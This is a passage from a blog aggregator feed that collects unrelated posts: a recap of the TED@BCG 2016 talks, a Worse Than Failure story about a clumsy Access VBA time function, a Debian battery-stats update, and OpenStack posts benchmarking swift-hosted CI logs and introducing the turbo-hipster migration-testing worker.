Planet Russell

TEDSeeing opportunities for change: The talks of TED@BCG

At the latest TED@BCG event at the Palais de Tokyo, in Paris, a diverse range of speakers took on the theme “to boldly transform.” Photo: Richard Hadley/TED

The future is built by those who see opportunities for change and act on them. At TED@BCG — the latest TED Institute event, held on May 18, 2016, at the Palais de Tokyo in Paris — speakers explored what it means to transform boldly. In three sessions of talks, curated and hosted by TED’s Editorial Director, Helen Walters, speakers shared insights about the future of our relationship with nature, the changing makeup of our organizations, the evolving interconnectedness of our economies and more, challenging preconceived notions and embracing change as the only constant.

After opening remarks from Rich Lesser, BCG’s president and CEO, the talks in Session 1 challenged us to look around to see how we might create change here and now, in our workplaces, teams and lives.

Develop a relationship with your curiosity. Not everyone has a friendly rapport with the question mark. Culture critic Laura Fox believes that to become intimately acquainted with knowledge, we must become comfortable with the words, “I don’t know.” By expressing ignorance and confronting our fear of judgement, she says, we can catalyze the painful, gritty task of admitting inexperience into growth — both personally and intellectually.

Want to get ahead? Be paranoid. Lars Fæste helps CEOs transform their businesses, and over the years, he’s noticed something troubling: Managers tend to settle with success instead of aggressively looking for ways to transform. With today’s unprecedented rate of change, transformation is the key to staying ahead of the competition and volatile market trends. In other words, if it ain’t broke, fix it. “The paranoid, they thrive. Transformation is a necessity, not an option. Either you do it, or it will be done to you.”

Light made by bacteria. Designer Sandra Rey invites us to look to nature to find unique solutions to some of the world’s most pressing problems. As an example, she describes her own effort to change the way we produce light by using one of nature’s own superpowers: bioluminescence. Using DNA sequences ordered from DNA banks, Rey is developing a technology to create biological lamps by coding genes for bioluminescence in E. coli bacteria. These lamps could not only change the source of our light, says Rey, they could change the entire paradigm of light: how we produce it, buy it, distribute it, how we use it, and how we regulate it.

Sandra Rey wants to use bioluminescence to change the way we light our homes and cities. Photo: Richard Hadley/TED

The fourth manufacturing revolution. Imagine a world where you can buy a custom-made product that’s exactly what you want, with the features you need, the design you prefer, at the same price as a product that’s been mass-produced. According to industrial systems thinker Olivier Scalabre, a revolution in manufacturing will soon make that possible. Scalabre predicts that new convergences of industry and technology will boost worldwide productivity by a third — and will make consumer proximity the most important factor in manufacturing. “If we play it right,” Scalabre says, “we’ll see sustainable growth in all of our economies.”

Why we must safeguard interconnectivity. The 2008 global financial crisis left much of the world reeling — markets went under, millions of jobs were lost and economic security was deeply compromised — in only a few days. IMF economist Min Zhu urges us to open our eyes to the effects of globalization, and the idea that a country’s size does not equate to economic influence; a small blow in one country can cause lasting damage worldwide. Zhu asks that we protect international financial security by working to understand the complex world around us.

Hallucinatory art, created by a neural net. Can computers create art? Blaise Agüera y Arcas is a principal scientist at Google, where he works with deep neural nets for machine perception and distributed learning. Agüera y Arcas breaks down the equation of perception, showing how computers have learned to recognize images through an iterative process. But when you turn the equation around, asking the computer to generate an image using the same neural network built to recognize them, the results are spectacular, hallucinatory collages that defy categorization. “Perception and creativity are connected,” Agüera y Arcas says. “Anything able to do perceptive acts is able to create.”

What happens when computers learn to do art? Google’s principal scientist Blaise Agüera y Arcas showed the TED@BCG audience how computers that were created to recognize images can also now create art. Photo: Richard Hadley/TED

In Session 2, speakers recognized that it isn’t enough to simply acknowledge and anticipate the changes coming our way; we have to face them head-on.

An Arab woman’s advice for fellow professionals. The poor, oppressed Arab woman — this tired and derogatory yet popular narrative doesn’t discourage Leila Hoteit. Instead, she uses it as fuel to prove that professional Arab women like her are their own role models, pushing boundaries every day while balancing more responsibilities than their male counterparts. Tracing her career as an engineer, advocate and mother in Abu Dhabi, she shares three lessons: Convert other people’s negative judgment into motivation, actively manage your life to leave work at work — and support fellow women instead of blindly competing against them.

Tracing her career as an engineer, advocate and mother, BCG partner and managing director Leila Hoteit shared three inspirational lessons for professional women. “Success is the best revenge,” she says. Photo: Richard Hadley/TED

A DNA revolution. Using DNA, we can create new medicines or make sure our food is safe to eat, but DNA technology has been confined to the ivory tower, until now. “We are living in the era of personal DNA technology,” says Sebastian Kraves, a molecular neurobiologist committed to bringing DNA analysis to the masses. From a truffle farmer analyzing his mushrooms to make sure they are not knockoffs to a virologist mapping the Ebola outbreak in Sierra Leone, Kraves shares examples of individuals using personal DNA technology to ask questions and solve problems in diverse fields and environments. “Revolutions don’t go backwards,” he says, and this one is “spreading faster than our imagination.”

Who says change needs to be hard? When transforming your organization, put people first. Change expert Jim Hemerling lays out five simple rules to convert company reorganization into an empowering, energizing task: inspire through purpose, go all in, enable people to succeed, instill a culture of continual learning and lead through inclusivity. By following these steps, he suggests, adapting your business to reflect today’s constantly evolving market will feel invigorating rather than exhausting.

Dark and delicate, chaotic rumble. Classical pianist Naufal Mukumi centered Session 2 with a selection of pieces by Russian composer Alexander Scriabin. Opening with a dark and delicate melody, he slowly progressed to a chaotic rumble, expertly creating an elegant surrealist tone. Mukumi’s performance was a perfect, soothing intermission for an exciting session.

Naufal Mukumi performs a selection of works by Alexander Scriabin at TED@BCG. Photo: Richard Hadley / TED

The corporate immune system. “Where better to turn for advice than nature — that’s been in the business of life and death longer than any company,” asks BCG’s own Martin Reeves. In his second turn on the TED@BCG stage, Reeves identifies six features — redundancy, diversity, modularity, adaptation, prudence, embeddedness — that underpin natural systems, giving them resiliency and endurance. Applying these principles can mean the difference between life and death for a company too. But in order to think more biologically, we need to change our business mindset and focus less on goals, analysis, efficiency and short-term returns. We need to ask ourselves not only “how good is our game?” but “how long will that game last?”

The future of money. There’s no reason why a coin or a dollar bill needs to have value, except that we’ve decided that it should, says Neha Narula, director of research at the Digital Currency Initiative, a part of the MIT Media Lab. Money is really about the relationships we have with each other; it’s a collective story about value by society, a collective fiction. Analog money, like cash, and digital money, like credit cards, both have some built-in impediments that slow them down (like needing to print or mint hard cash). Now, with cryptocurrencies like Bitcoin, Ethereum and Stellar, we’re moving towards a time of programmable money, where anyone can securely pay anyone else without signing up for a bank, asking permission, doing a conversion or worrying about money getting stuck. “Programmable money democratizes money,” Narula says. “By democratizing money, things are going to change and unfold in ways we can’t even predict.”

Finally, in Session 3, speakers threw down the gauntlet to status quo thinking, encouraging us all to do more in whatever ways we can.

A whole-body music composition. Producer, songwriter, beatboxer and vocal arranger MaJiKer uses his whole body to express himself through music. At TED@BCG, he premiered a new piece that combines piano (occasionally played with his foot and head) with beatboxing to craft a catchy, experimental composition.

Harnessing nature’s own designs. Unlike the mere 200-year timespan of modern science, nature has perfected its materials over three billion years, creating materials superior to anything we have managed to produce by ourselves, argues nanobiotechnologist Oded Shoseyov. Shoseyov walks us through amazing examples of materials found across the plant and animal kingdoms in everything from cat fleas to sequoia trees — and the creative ways his team is harnessing these materials for applications as widespread as sports shoes and medical implants.

Transforming the future of two million children. Education innovator Seema Bansal forged a path to public education reform for 15,000 schools in Haryana, India, by setting an ambitious goal: By 2020, 80 percent of children should have grade-level knowledge. The catch? The reforms must be scalable for each school, and function within existing budgets and resources. Bansal and her team found success in low-cost, creative techniques — such as communicating with teachers using SMS group chats — that have measurably improved learning and engagement in the past year.

The commodity of trust. “Every now and then, a truly stellar new technology emerges, and it always takes us to places we never imagined,” says blockchain specialist Mike Schwartz. We witnessed this type of revolution with the combustion engine, the telephone, computers and the Internet, and now blockchain promises to be the next to transform us. Blockchain will commodify trust in the way that the Internet commodified communication, so that “people with no knowledge of each other can interact with confidence and without relying on a trusted third party to do so.” But as with any new technology, there is a steep learning curve and it will take a lot of trial and error to make that future a reality: “In order to shape this future you need to participate. Those organizations that learn how to play in more open and collaborative ecosystems will survive and thrive. Those that don’t probably won’t.”

A tiny forest you can grow in your backyard. Forests don’t only have to be far-flung nature reserves, isolated from human life. TED Fellow Shubhendu Sharma brings small, diverse forests back to urban life by flipping the script on engineering: Instead of taking natural resources and turning them into products, he engineers soil, microbes and biomass to kickstart nature’s uninhibited processes of growth. By mixing the right native tree species, Sharma has created 75 dense, thriving man-made forests in 25 cities worldwide.

Reinventing modern agriculture with Space Age technology. How will agriculture expand to feed our growing world in a way that doesn’t deplete resources? Lisa Dyson is working on an idea developed by NASA in the 1960s for deep-space travel — adapting it for use here on Earth. Dyson is using microbes called hydrogenotrophs — super-charged carbon recyclers that can produce nutrients in a matter of hours without sunlight and in small spaces — to create a virtuous, closed-loop carbon cycle that could sustain life on earth. These microbes can produce the building blocks of foods like pasta and bread as well as oils needed for industry. “Let us create systems that keep planet Earth, our spaceship, from not crashing, and let us develop ways of living that will be beneficial to the lives of the 10 billion that will be on this planet by 2050.”

Lisa Dyson wants to use super-charged carbon recycling microbes to change the way we feed the world. Photo: Richard Hadley/TED


Planet DebianEnrico Zini: I chipped in

I clicked on a random link and I found myself again in front of a wired.com popup that wanted to explain to me what I have to think about adblockers.

This time I was convinced, and I took my wallet out.

I finally donated $35 to AdBlock.

(And then somebody pointed me to uBlock Origin and I switched to that.)

Worse Than FailureCodeSOD: Data Date Access

Perhaps the greatest evil Microsoft ever perpetrated on the world was putting a full-featured IDE on every end user’s desktop: Microsoft Office. Its macro system is a stripped-down version of Visual Basic, complete with a UI-building tool, and when used in conjunction with Access, allows anyone to build a database-driven application. Anyone who’s spent enough time in an “enterprise” has probably inherited at least one Access application that was developed by somebody out at a manufacturing plant and magically became “mission critical”. Still, we can’t blame the end users for that.

There’s a special subset of developers, though, who, when trying to come up with an application that’s easy to deploy, choose Access as their development environment. “It’s already on all the users’ machines,” they say. “We can just put the MDB on a shared drive,” they say. And that’s how Ben gets handed an Access database and told, “figure out why this is so slow?”

The specific Access database Ben inherited was part of a home-brew customer-relationship-management package, which meant most of the queries needed to filter through a database of emails sent to customers. The SQL was already pretty bad, because it ran three times: once for all the emails with a certain timestamp, once for all the emails a minute earlier, and once for all the emails a minute later. Each query also filtered by the from-field, which really killed the performance since 25% of the emails were sent from the same email address, meaning the three queries did the same filtering three times, and Access isn’t exactly all about the optimization of SQL performance.

What really caught Ben’s eye, though, was that the query didn’t use the built-in DateAdd function to calculate the one minute earlier/later rule. It used a custom-defined timeAdjust function.

' This function takes a time and returns a rounded time.  If an adjustment
' has been given (+1 or -1 minute) then the time is increased or
' decreased by one minute.  Seconds are zeroed during the process and
' are only included in the returned time is the blSeconds flag is
' true.
Function timeAdjust(varTime, intAdjust As Integer, blSeconds As Boolean) As String
    Dim strHours
    Dim strMins
    Dim strSecs

    ' Get parts of the time
    strHours = Format(varTime, "hh")
    strMins = Format(varTime, "nn")
    strSecs = Format(varTime, "ss")

    ' Adjust time as required
    If intAdjust = 1 Then
        If strMins = "59" Then
            strMins = "00"
            If strHours = "23" Then
                strHours = "00"
            Else
                strHours = strHours + 1
                If Len(strHours) = 1 Then
                    strHours = "0" & strHours
                End If
            End If
        Else
            strMins = strMins + 1
            If Len(strMins) = 1 Then
                strMins = "0" & strMins
            End If
        End If
    End If

    If intAdjust = -1 Then
        If strMins = "00" Then
            strMins = "59"
            If strHours = "00" Then
                strHours = "23"
            Else
                strHours = strHours - 1
                If Len(strHours) = 1 Then
                    strHours = "0" & strHours
                End If
            End If
        Else
            strMins = strMins - 1
            If Len(strMins) = 1 Then
                strMins = "0" & strMins
            End If
        End If
    End If

    ' Rebuild time
    If blSeconds Then
        timeAdjust = strHours & ":" & strMins & ":00"
    Else
        timeAdjust = strHours & ":" & strMins
    End If

    Exit Function
ErrHandler:
    GenericADOErrHandler "clsADOTeamTallies - timeAdjust"
End Function
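
For comparison, the whole dance collapses to a couple of lines once a real date library is involved (Access’s built-in DateAdd would do the same job in the query itself). Here’s a rough Python sketch of the equivalent, purely for illustration and not the fix Ben eventually shipped:

    from datetime import datetime, timedelta

    def time_adjust(ts, adjust_minutes, with_seconds=False):
        """Shift a timestamp by +/- N minutes, zero the seconds, and format it."""
        shifted = ts.replace(second=0, microsecond=0) + timedelta(minutes=adjust_minutes)
        return shifted.strftime("%H:%M:%S" if with_seconds else "%H:%M")

    print(time_adjust(datetime(2016, 5, 18, 23, 59), 1))   # prints "00:00"
    print(time_adjust(datetime(2016, 5, 18, 0, 0), -1))    # prints "23:59"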

After a lengthy campaign, Ben received permission to re-implement the application in C# with a real database on the backend. That project was completed and left behind many happy customers.

Planet DebianPetter Reinholdtsen: Discharge rate estimate in new battery statistics collector for Debian

Yesterday I updated the battery-stats package in Debian with a few patches sent to me by skilled and enterprising users. There were some nice user-visible changes. First of all, both desktop menu entries now work. A design flaw in one of the scripts made the history graph fail to show up (its PNG was dumped in ~/.xsession-errors) if no controlling TTY was available. The script worked when called from the command line, but not when called from the desktop menu. I changed this to look for a DISPLAY variable or a TTY before deciding where to draw the graph, and now the graph window pops up as expected.

The next new feature is a discharge rate estimator in one of the graphs (the one showing the last few hours). Also new is the use of colours: charging is shown in blue and discharging in red. The percentages in this graph are relative to the last full charge, not the battery design capacity.
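
The idea behind such an estimate is simple; a rough sketch in Python (for illustration only, not the actual implementation in the package) could look like this:

    import numpy as np

    # (seconds since start, remaining percent) samples from the collector log
    samples = [(0, 98.0), (600, 96.5), (1200, 95.1), (1800, 93.6)]
    t, pct = np.array(samples).T
    slope, intercept = np.polyfit(t, pct, 1)      # slope is in percent per second
    if slope < 0:
        print("discharging at %.1f%%/h, about %.1f hours left"
              % (-slope * 3600, pct[-1] / -slope / 3600))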

The other graph shows the entire history of the collected battery statistics, comparing it to the design capacity of the battery to visualise how the battery lifetime gets shorter over time. The red line in this graph is what the previous graph considers 100 percent:

In this graph you can see that I only charge the battery to 80 percent of last full capacity, and how the capacity of the battery is shrinking. :(

The last new feature is in the collector, which will now handle more hardware models. On some hardware, Linux power supply information is stored in /sys/class/power_supply/ACAD/, while the collector previously only looked in /sys/class/power_supply/AC/. Now both are checked to figure out if there is power connected to the machine.
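
In rough Python terms (for illustration only; the collector itself is not this code), the check amounts to something like this:

    from pathlib import Path

    def on_ac_power(names=("AC", "ACAD")):
        """Return True if any known AC adapter sysfs node reports power online."""
        for name in names:
            online = Path("/sys/class/power_supply") / name / "online"
            if online.exists():
                return online.read_text().strip() == "1"
        return False  # no adapter node found; assume we are on battery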

If you are interested in how your laptop battery is doing, please check out the battery-stats package in Debian unstable, or rebuild it on Jessie to get it working on Debian stable. :) The upstream source is available from github. Patches are very welcome.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

Planet Linux AustraliaJoshua Hesketh: OpenStack infrastructure swift logs and performance

Turns out I’m not very good at blogging very often. However I thought I would put what I’ve been working on for the last few days here out of interest.

For a while the OpenStack Infrastructure team have wanted to move away from storing logs on disk to something more cloudy – namely, swift. I’ve been working on this on and off for a while and we’re nearly there.

For the last few weeks the openstack-infra/project-config repository has been uploading its CI test logs to swift as well as storing them on disk. This has given us the opportunity to compare the last few weeks of data and see what kind of effects we can expect as we move assets into object storage.

  • I should add a disclaimer/warning, before you read, that my methods here will likely make statisticians cringe horribly. For the moment though I’m just getting an indication for how things compare.

The set up

Fetching files from object storage is nothing particularly new or special (CDNs have been doing it for ages). However, for our usage we want to serve logs with os-loganalyze, which gives us the opportunity to hyperlink to timestamp anchors or filter by log severity.

First though we need to get the logs into swift somehow. This is done by having the job upload its own logs. Rather than using (or writing) a Jenkins publisher we use a bash script to grab the job’s own console log (pulled from the Jenkins web ui) and then upload it to swift using credentials supplied to the job as environment variables (see my zuul-swift contributions).

This does, however, mean part of the logs are missing. For example the fetching and upload processes write to Jenkins’ console log but because it has already been fetched these entries are missing. Therefore this wants to be the very last thing you do in a job. I did see somebody do something similar where they keep the download process running in a fork so that they can fetch the full log but we’ll look at that another time.

When a request comes into logs.openstack.org, it is handled like so:

  1. apache vhost matches the server
  2. if the request ends in .txt.gz, console.html or console.html.gz rewrite the url to prepend /htmlify/
  3. if the requested filename is a file or folder on disk, serve it up with apache as per normal
  4. otherwise rewrite the requested file to prepend /htmlify/ anyway

os-loganalyze is set up as a WSGIScriptAlias at /htmlify/. This means all files that aren’t on disk are sent to os-loganalyze (or if the file is on disk but matches a file we want to mark up it is also sent to os-loganalyze). os-loganalyze then does the following:

  1. Checks the requested file path is legitimate (or throws a 400 error)
  2. Checks if the file is on disk
  3. Checks if the file is stored in swift
  4. If the file is found, markup (such as anchors) is optionally added and the request is served
    1. When serving from swift the file is fetched via the swiftclient by os-loganalyze in chunks and streamed to the user on the fly (see the sketch after this list). Obviously fetching from swift will have larger network consequences.
  5. If no file is found, 404 is returned
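
That chunked fetch in step 4.1 looks roughly like the following sketch using python-swiftclient; the container, object name and auth details are made up for illustration, and this is not os-loganalyze’s actual code:

    import swiftclient.client

    def stream_from_swift(container, obj, auth_url, user, key):
        """Fetch an object from swift in chunks, yielding pieces as they arrive."""
        conn = swiftclient.client.Connection(authurl=auth_url, user=user, key=key)
        headers, body = conn.get_object(container, obj, resp_chunk_size=64 * 1024)
        for chunk in body:
            # os-loganalyze would add markup (anchors, severity filtering) here
            yield chunk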

If the file exists both on disk and in swift then step #2 can be skipped by passing ?source=swift as a parameter (thus only attempting to serve from swift). In our case the files exist both on disk and in swift since we want to compare the performance so this feature is necessary.

So now that we have the logs uploaded into swift and stored on disk we can get into some more interesting comparisons.

Testing performance process

My first attempt at this was simply to fetch the files from disk and then from swift and compare the results. A crude little python script did this for me: http://paste.openstack.org/show/122630/

The script fetches a copy of the log from disk and then from swift (both through os-loganalyze and therefore marked-up) and times the results. It does this in two scenarios:

  1. Repeatably fetching the same file over again (to get a good average)
  2. Fetching a list of recent logs from gerrit (using the gerrit api) and timing those
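
The shape of the script is roughly the following (a simplified sketch rather than the actual paste linked above; the URL is a placeholder and only the response and transfer phases are timed):

    import time
    import requests

    LOG_URL = "http://logs.openstack.org/some/job/console.html"  # placeholder path

    def timed_fetch(url, source=None):
        """Fetch a log, optionally forcing the swift backend, and time the phases."""
        params = {"source": source} if source else {}
        start = time.time()
        resp = requests.get(url, params=params, stream=True)
        first_byte = time.time()
        size = sum(len(chunk) for chunk in resp.iter_content(8192))
        done = time.time()
        return {"response_ms": (first_byte - start) * 1000,
                "transfer_ms": (done - first_byte) * 1000,
                "size_kb": size / 1024.0}

    disk_result = timed_fetch(LOG_URL)                    # disk is checked first
    swift_result = timed_fetch(LOG_URL, source="swift")   # force the swift backend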

I then ran this in two environments.

  1. On my local network the other side of the world to the logserver
  2. On 5 parallel servers in the same DC as the logserver

Running on my home computer likely introduced a lot of errors due to my limited bandwidth, noisy network and large network latency. To help eliminate these errors I also tested it on 5 performance servers in the Rackspace cloud next to the log server itself. In this case I used ansible to orchestrate the test nodes thus running the benchmarks in parallel. I did this since in real world use there will often be many parallel requests at once affecting performance.

The following metrics are measured for both disk and swift:

  1. request sent – time taken to send the http request from my test computer
  2. response – time taken for a response from the server to arrive at the test computer
  3. transfer – time taken to transfer the file
  4. size – filesize of the requested file

The total time can be found by adding the first 3 metrics together.

 

Results

Home computer, sequential requests of one file

 

The complementary colours are the same metric and the darker line represents swift’s performance (over the lighter disk performance line). The vertical lines over the plots are the error bars while the fetched filesize is the column graph down the bottom. Note that the transfer and file size metrics use the right axis for scale while the rest use the left.

As you would expect the requests for both disk and swift files are more or less comparable. We see a more noticeable difference on the responses though with swift being slower. This is because disk is checked first, and if the file isn’t found on disk then a connection is sent to swift to check there. Clearly this is going to be slower.

The transfer times are erratic and varied. We can’t draw much from these, so let’s keep analyzing deeper.

The total time from request to transfer can be seen by adding the times together. I didn’t do this as when requesting files of different sizes (in the next scenario) there is nothing worth comparing (as the file sizes are different). Arguably we could compare them anyway as the log sizes for identical jobs are similar but I didn’t think it was interesting.

The file sizes are there for interest sake but as expected they never change in this case.

You might notice that the end of the graph is much noisier. That is because I’ve applied some rudimentary data filtering.

Metric              SD (disk)     SD (swift)    Mean (disk)   Mean (swift)
request sent (ms)   54.89516183   43.71917948   283.9594368   282.5074598
response (ms)       56.74750291   194.7547117   373.7328851   531.8043908
transfer (ms)       849.8545127   838.9172066   5091.536092   5122.686897
size (KB)           7.121600095   7.311125275   1219.804598   1220.735632

 

I know it’s argued as poor practice to remove outliers using twice the standard deviation, but I did it anyway to see how it would look. I only did one pass at this even though I calculated new standard deviations.

 

Metric              SD (disk)     SD (swift)    Mean (disk)   Mean (swift)
request sent (ms)   13.88664039   14.84054789   274.9291111   276.2813889
response (ms)       44.0860569    115.5299781   364.6289583   503.9393472
transfer (ms)       541.3912899   515.4364601   5008.439028   5013.627083
size (KB)           7.038111654   6.98399691    1220.013889   1220.888889

 

I then moved the outliers to the end of the results list instead of removing them completely and used the newly calculated standard deviation (ie without the outliers) as the error margin.

Then to get a better indication of what the average times are I plotted the histograms of each of these metrics.

Here we can see a similar request time.
 

Here it is quite clear that swift is slower at actually responding.
 

Interestingly both disk and swift sources have a similar total transfer time. This is perhaps an indication of my network limitation in downloading the files.

 

Home computer, sequential requests of recent logs

Next from my home computer I fetched a bunch of files in sequence from recent job runs.

 

 

Again I calculated the standard deviation and average to move the outliers to the end and get smaller error margins.

Metric              SD (disk)     SD (swift)    Mean (disk)   Mean (swift)
request sent (ms)   54.89516183   43.71917948   283.9594368   282.5074598
response (ms)       194.7547117   56.74750291   531.8043908   373.7328851
transfer (ms)       849.8545127   838.9172066   5091.536092   5122.686897
size (KB)           7.121600095   7.311125275   1219.804598   1220.735632

Second pass without outliers

Metric              SD (disk)     SD (swift)    Mean (disk)   Mean (swift)
request sent (ms)   13.88664039   14.84054789   274.9291111   276.2813889
response (ms)       115.5299781   44.0860569    503.9393472   364.6289583
transfer (ms)       541.3912899   515.4364601   5008.439028   5013.627083
size (KB)           7.038111654   6.98399691    1220.013889   1220.888889

 

What we are probably seeing here with the large number of slower requests is network congestion in my house. Since the script requests disk, swift, disk, swift and so on, the congestion evens out, causing latency in both sources as seen.
 

Swift is very much slower here.

 

Although comparable in transfer times. Again this is likely due to my network limitation.
 

The size histograms don’t really add much here.
 

Rackspace Cloud, parallel requests of same log

Now to reduce latency and other network effects I tested fetching the same log over again in 5 parallel streams. Granted, it may have been interesting to see a machine close to the log server do a bunch of sequential requests for the one file (with little other noise) but I didn’t do it at the time unfortunately. Also we need to keep in mind that others may be accessing the log server and therefore any request in both my testing and normal use is going to have competing load.
 

I collected a much larger amount of data here making it harder to visualise through all the noise and error margins etc. (Sadly I couldn’t find a way of linking to a larger google spreadsheet graph). The histograms below give a much better picture of what is going on. However out of interest I created a rolling average graph. This graph won’t mean much in reality but hopefully will show which is faster on average (disk or swift).
 

Now that we’re closer to the server, you can see that swift is noticeably slower. This is confirmed by the averages:

 

Metric              SD (disk)     SD (swift)     Mean (disk)   Mean (swift)
request sent (ms)   32.42528982   9.749368282    4.87337544    4.05191168
response (ms)       245.3197219   781.8807534    39.51898688   245.0792916
transfer (ms)       1082.253253   2737.059103    1553.098063   4167.07851
size (KB)           0             0              1226          1232

Second pass without outliers

Metric              SD (disk)     SD (swift)     Mean (disk)   Mean (swift)
request sent (ms)   1.375875503   0.8390193564   3.487575109   3.418433003
response (ms)       28.38377158   191.4744331    7.550682037   96.65978872
transfer (ms)       878.6703183   2132.654898    1389.405618   3660.501404
size (KB)           0             0              1226          1232

 

Even once outliers are removed we’re still seeing a large latency from swift’s response.

The standard deviation in the requests has now become very small. We’ve clearly made a difference moving closer to the logserver.

 

Very nice and close.
 

Here we can see that for roughly half the requests the response time was the same for swift as for the disk. It’s the other half of the requests bringing things down.
 

The transfer for swift is consistently slower.

 

Rackspace Cloud, parallel requests of recent logs

Finally I ran just over a thousand requests in 5 parallel streams from computers near the logserver for recent logs.

 

Again the graph is too crowded to see what is happening so I took a rolling average.

 

 

Metric              SD (disk)      SD (swift)     Mean (disk)   Mean (swift)
request sent (ms)   0.7227904332   0.8900549012   3.515711867   3.56191383
response (ms)       434.8600827    909.095546     145.5941102   189.947818
transfer (ms)       1913.9587      2132.992773    2427.776165   2875.289455
size (KB)           6.341238774    7.659678352    1219.940039   1221.384913

Second pass without outliers

Metric              SD (disk)      SD (swift)     Mean (disk)   Mean (swift)
request sent (ms)   0.4798803247   0.4966553679   3.379718381   3.405770445
response (ms)       109.6540634    171.1102999    70.31323922   86.16522485
transfer (ms)       1348.939342    1440.2851      2016.900047   2426.312363
size (KB)           6.137625464    7.565931993    1220.318912   1221.881335

 

The averages here are much more reasonable than when we continually tried to request the same file. Perhaps we’re hitting limitations with swift’s serving abilities.

 

I’m not sure why we have a sinc-like shape here. A network expert may be able to tell you more. As far as I know this isn’t important to our analysis other than the fact that both disk and swift match.
 

Here we can now see swift keeping a lot closer to disk results than when we only requested the one file in parallel. Swift is still, unsurprisingly, slower overall.
 

Swift still loses out on transfers but again does a much better job of keeping up.
 

Error sources

I haven’t accounted for any of the following swift intricacies (in terms of caches etc):

  • Fetching random objects
  • Fetching the same object over and over
  • Fetching in parallel multiple different objects
  • Fetching the same object in parallel

I also haven’t done anything to account for things like file system caching, network profiling, noisy neighbours etc etc.

os-loganalyze tries to keep authenticated with swift, however

  • This can timeout (causes delays while reconnecting, possibly accounting for some spikes?)
  • This isn’t thread safe (are we hitting those edge cases?)

We could possibly explore getting longer authentication tokens or having os-loganalyze pull from an unauthenticated CDN to add the markup and then serve. I haven’t explored those here though.

os-loganalyze also handles all of the requests not just from my testing but also from anybody looking at OpenStack CI logs. In addition to this it also needs to deflate the gzip stream if required. As such there is potentially a large unknown (to me) load on the log server.

In other words, there are plenty of sources of errors. However I just wanted to get a feel for the general responsiveness compared to fetching from disk. Both sources had noise in their results so it should be expected in the real world when downloading logs that it’ll never be consistent.

Conclusions

As you would expect the request times are pretty much the same for both disk and swift (as mentioned earlier) especially when sitting next to the log server.

The response times vary but looking at the averages and the histograms these are rarely large. Even in the case where requesting the same file over and over in parallel caused responses to go slow, these were only on the order of 100ms.

The response time is the important one as it indicates how soon a download will start for the user. The total time to stream the contents of the whole log is seemingly less important if the user is able to start reading the file.

One thing that wasn’t tested was streaming of different file sizes. All of the files were roughly the same size (being logs of the same job). For example, what if the asset was a few gigabytes in size, would swift have any significant differences there? In general swift was slower to stream the file but only by a few hundred milliseconds for a megabyte. It’s hard to say (without further testing) if this would be noticeable on large files where there are many other factors contributing to the variance.

Whether or not these latencies are an issue is relative to how the user is using/consuming the logs. For example, if they are just looking at the logs in their web browser on occasion they probably aren’t going to notice a large difference. However if the logs are being fetched and scraped by a bot then it may see a decrease in performance.

Overall I’ll leave deciding on whether or not these latencies are acceptable as an exercise for the reader.

Planet Linux AustraliaJoshua Hesketh: Third party testing with Turbo-Hipster

Why is this hipster voting on my code?!

Soon you are going to see a new robot barista leaving comments on Nova code reviews. He is obsessed with espresso, that band you haven’t heard of yet, and easing the life of OpenStack operators.

Doing a large OpenStack deployment has always been hard when it came to database migrations. Running a migration requires downtime, and when you have giant datasets that downtime could be hours. To help catch these issues Turbo-Hipster (http://josh.people.rcbops.com/2013/09/building-a-zuul-worker/) will now run your patchset’s migrations against copies of real databases. This will give you valuable feedback on the success of the patch, and how long it might take to migrate.

Depending on the results, Turbo-Hipster will add a review to your patchset that looks something like this:

Example turbo-hipster post

What should I do if Turbo-Hipster fails?

That depends on why it has failed. Here are some scenarios and steps you can take for different errors:

FAILURE – Did not find the end of a migration after a start

  • If you look at the log you should find that a migration began but never finished. Hopefully there’ll be a traceback for you to follow through to get some hints about why it failed.

WARNING – Migration %s took too long

  • In this case your migration took a long time to run against one of our test datasets. You should reconsider what operations your migration is performing and see if there are any optimisations you can make, or if each step is really necessary. If there is no way to speed up your migration you can email us at rcbau@rcbops.com for an exception.

FAILURE – Final schema version does not match expectation

  • Somewhere along the line the migrations stopped and did not reach the expected version. The datasets start at previous releases and have to upgrade all the way through. If you see this, inspect the log for tracebacks or other hints about the failure.

FAILURE – Could not setup seed database. FAILURE – Could not find seed database.

  • These two are internal errors. If you see either of these, contact us at rcbau@rcbops.com to let us know so we can fix and rerun the tests for you.

FAILURE – Could not import required module.

  • This error probably shouldn’t happen as Jenkins should catch it in the unit tests before Turbo-Hipster launches. If you see this, please contact us at rcbau@rcbops.com and let us know.

If you receive an error that you think is a false positive, leave a comment on the review with the sole contents of recheck migrations.

If you see any false positives or have any questions or problems please contact us on rcbau@rcbops.com

Planet Linux AustraliaJoshua Hesketh: LinuxCon Europe

After travelling very close to literally the other side of the world[0], I’m in Edinburgh for LinuxCon EU, recovering from jetlag and getting ready to attend. I’m very much looking forward to my first LinuxCon, meeting new people and learning lots :-).

If you’re around and would like to catch up drop me a comment here. Otherwise I’ll see you at the conference!

[0] http://goo.gl/maps/JeJO2

Planet Linux AustraliaJoshua Hesketh: New Blog

Welcome to my new blog.

You can find my old one here: http://josh.opentechnologysolutions.com/blog/joshua-hesketh

I intend on back-porting those posts into this one in due course. For now though I’m going to start posting about my adventures in OpenStack!

Planet Linux AustraliaJoshua Hesketh: Introducing turbo-hipster for testing nova db migrations

Zuul is the continuous integration utility used by OpenStack to gate patchsets against tests. It takes care of communicating with gerrit (the code review system) and the test workers – usually Jenkins. You can read more about how the systems tie together on the OpenStack Project Infrastructure page.

The nice thing is that zuul doesn’t require you to use Jenkins. Anybody can provide a worker to zuul using the gearman protocol (which is a simple job server). Enter turbo-hipster*.

“Turbo-hipster is a CI worker with pluggable tasks initially designed to test OpenStack’s database migrations against copies of real databases.”

This will hopefully catch scenarios where changes to the database schema may not work due to outliers in real datasets and also help find where a migration may take an unreasonable amount of time against a large database.

In zuul’s layout configuration we are able to specify which jobs should be run against which projects in which pipelines. For example, for nova we want to run tests when a patchset is created, but we don’t need to run tests against it (necessarily) once it is merged etc. So in zuul we specify a new gate (aka job) to test nova against real databases.

turbo-hipster then listens for jobs created on that gate using the gearman protocol. Once it receives a patchset from zuul it creates a virtual environment and tests the upgrades. It then compiles and sends back the results.
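
In rough terms the worker side looks something like the following sketch using OpenStack’s gear library (the gearman server name and the migration-running function are made up for illustration; the real worker does considerably more):

    import json
    import gear

    def run_migrations(args):
        """Hypothetical plugin task: set up a venv and run the upgrades."""
        return {'result': 'SUCCESS'}

    worker = gear.Worker('turbo-hipster')
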